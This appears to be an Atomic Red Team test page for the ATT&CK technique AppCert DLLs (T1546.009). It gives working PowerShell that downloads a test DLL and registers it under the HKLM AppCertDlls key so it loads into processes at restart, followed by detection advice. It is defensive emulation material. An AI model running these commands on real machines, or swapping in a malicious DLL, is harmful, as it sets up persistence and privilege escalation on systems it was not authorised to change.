# T1546.009 - Event Triggered Execution: AppCert DLLs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. (Citation: Elastic Process Injection July 2017)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. 

## Atomic Tests

### Atomic Test #1 - Create registry persistence via AppCert DLL
Creates a new 'AtomicTest' value pointing to an AppCert DLL in the AppCertDlls registry key. 
Once the computer restarted, the DLL will be loaded in multiple processes and write an 
'AtomicTest.txt' file in C:\Users\Public\ to validate that the DLL executed succesfully.

Reference: https://skanthak.homepage.t-online.de/appcert.html

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: File to copy must exist on disk at specified location (#{dll_path})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.009/bin/AtomicTest.dll" -OutFile "PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll"

```

In [ ]:
Invoke-AtomicTest T1546.009 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Copy-Item PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll -Force
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /t REG_EXPAND_SZ /d "C:\Users\Public\AtomicTest.dll" /f
if($false){Restart-Computer} 
```

In [ ]:
Invoke-AtomicTest T1546.009 -TestNumbers 1

## Detection
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) 

Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)

Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.